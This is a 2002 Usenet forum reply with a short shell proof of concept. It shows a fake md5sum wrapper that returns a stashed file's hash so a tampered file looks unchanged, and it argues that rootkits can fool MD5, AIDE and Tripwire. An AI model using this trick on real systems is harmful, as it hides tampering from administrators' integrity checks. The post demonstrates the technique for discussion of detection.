Re: http attack

From: RainbowHat (nHiATlE@blSackholeP.mAit.edMu.invalid)
Date: 04/03/02


From: RainbowHat <nHiATlE@blSackholeP.mAit.edMu.invalid>
Date: Wed, 3 Apr 2002 18:26:59 +0000 (UTC)


< Nico Kadel-Garcia
>Insufficient. Some rootkits apparently replace md5sum. I'd suggest
>re-installing, it's usually a lot faster.

Here is a proof of concept. Please try. But real LKM or libc rootkits
are more sophisticated. MD5, AIDE and Tripwire ineffect.

cd ~; mkdir bin; echo 31337 > bin/laden; md5sum bin/laden

6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden

echo 32i1 > bin/laden; md5sum bin/laden #chown -R usa.usa bin/laden

5a2f88c1de17af5707bb5c51b47b37a4 bin/laden

Copy, paste to ./md5sum file and save.
-------------------8<------------------8<-------------------8<--------
#!/bin/sh
#
# This is not an April full but a proof of concept code.
#

#Vreal="$(which md5sum)"
Vreal='/usr/bin/md5sum'

if [ "$(echo $1 | grep laden)" ] # here is a bug but simple
then
   $Vreal dev/.cave/laden | sed "s,dev/\.cave/laden,$1,"
else
   $Vreal "$@"
fi
-------------------8<------------------8<-------------------8<--------

chmod u+x ./md5sum; mkdir -p dev/.cave; echo 31337 > bin/laden
cp -a bin/laden dev/.cave; ./md5sum bin/laden

6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden

echo 32i1 > bin/laden; ./md5sum bin/laden #chown -R usa.usa bin/laden

6ae8caaf43a5e4a71e32d94c51d4e918 bin/laden

-- 
Best Regards, RainbowHat. I support FULL DISCLOSURE.
----+----1----+----2----+----3----+----4----+----5----+----6----+----7